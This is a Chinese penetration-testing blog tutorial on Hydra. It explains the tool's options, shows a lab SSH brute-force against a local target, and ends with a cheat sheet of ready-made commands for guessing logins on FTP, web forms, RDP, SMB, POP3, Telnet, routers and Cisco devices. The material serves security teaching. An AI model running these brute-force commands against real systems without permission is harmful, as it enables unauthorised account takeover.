小言_互联网的博客

【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战

417人阅读  评论(0)

目录

九头蛇hydra

使用方法

案例分析

暴破ssh登录密码

环境介绍

开始爆破

破解成功

测试登录

各种协议破解汇总

FTP协议破解

http协议破解

https协议破解

路由器破解

http-proxy协议破解

smb破解

 Windows远程桌面

邮箱pop3

telnet破解

语音通讯工具teamspeak

cisco


九头蛇hydra

记得美国队长中的大反派hydra(九头蛇)组织吗?

今天介绍的这款渗透测试工具,也叫这个名字。

hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大

kali下是默认安装的,几乎支持所有协议的在线破解。

密码能否破解,在于字典是否强大以及电脑的性能。

我们就介绍下,这个装备怎么用

使用方法

语法:Hydra 参数 IP 服务

  
  1. 参数:
  2. -l login 小写,指定用户名进行破解
  3. -L file 大写,指定用户的用户名字典
  4. -p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
  5. -P file 大写,用于指定密码字典。
  6. -e ns 额外的选项, n:空密码试探, s:使用指定账户和密码试探
  7. -M file 指定目标 ip列表文件,批量破解。
  8. -o file 指定结果输出文件
  9. -f 找到第一对登录名或者密码的时候中止破解。
  10. -t tasks 同时运行的线程数,默认是16
  11. -w time 设置最大超时时间,单位
  12. -v / -V 显示详细过程
  13. -R 恢复爆破(如果破解中断了,下次执行 hydra -R / path/ to/ hydra .restore 就可以继续任务。)
  14. -x 自定义密码。

 


  
  1. service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
  2. 注意点: 1.自己创建字典,然后放在当前的目录下或者指定目录。
  3. 2.参数可以统一放在最后,格式比如hydra ip 服务 参数。
  4. 3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。
  5. 4.缺点,如果目标网站登录时候需要验证码就无法破解。
  6. 5.man hydra最万能。
  7. 6.或者hydra -U http-form等查看具体帮助。

案例分析

暴破ssh登录密码

环境介绍


  
  1. 攻击机:kali
  2. 装有hydra工具
  3. 靶机:192.168.154.131
  4. 安装ssh服务,正常运行

为了测试方便,我们创建两个简单的字典文件,如下:

开始爆破

根据命令参数,组织参数格式如下:

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

破解成功

因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。

测试登录

使用得到的用户名/密码登录服务器,登录成功

各种协议破解汇总

FTP协议破解


  
  1. 破解ftp:
  2. hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v

http协议破解


  
  1. get方式提交,破解web登录:
  2. hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/
  3. hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php
  4. post方式提交,破解web登录:
  5. hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
  6. #/index.php …这个是登录的 url
  7. #后门是POST的数据 其中的用户名密码使用 USER PASS 来代替
  8. #然后是如果登录出错 会出现的字符 。。。然后开始破解

https协议破解


  
  1. 破解https
  2. hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https

路由器破解


  
  1. hydra -l admin -x 6:10:1a.~!@ #$%^&()-= -t 8 192.168.1.1 http-get /
  2. -l admin 为尝试破解的用户名。
  3. # -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)

http-proxy协议破解


  
  1. 破解http-proxy:
  2. hydra -l admin -P 字典.txt http-proxy://IP地址

smb破解


  
  1. 破解smb:
  2. hydra -l 用户名字典 -P 密码字典 IP地址 smb

 Windows远程桌面


  
  1. 破解rdp(windows远程登录):
  2. hydra ip地址 rdp -l administrator -P 密码字典.txt -V

邮箱pop3


  
  1. 破解邮箱pop3:
  2. hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3

telnet破解

hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V

语音通讯工具teamspeak

hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak

cisco


  
  1. hydra -P 密码字典 IP地址 cisco
  2. hydra -m cloud -P 密码字典 IP地址 cisco-enable

 


转载:https://blog.csdn.net/weixin_42350212/article/details/116419960
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场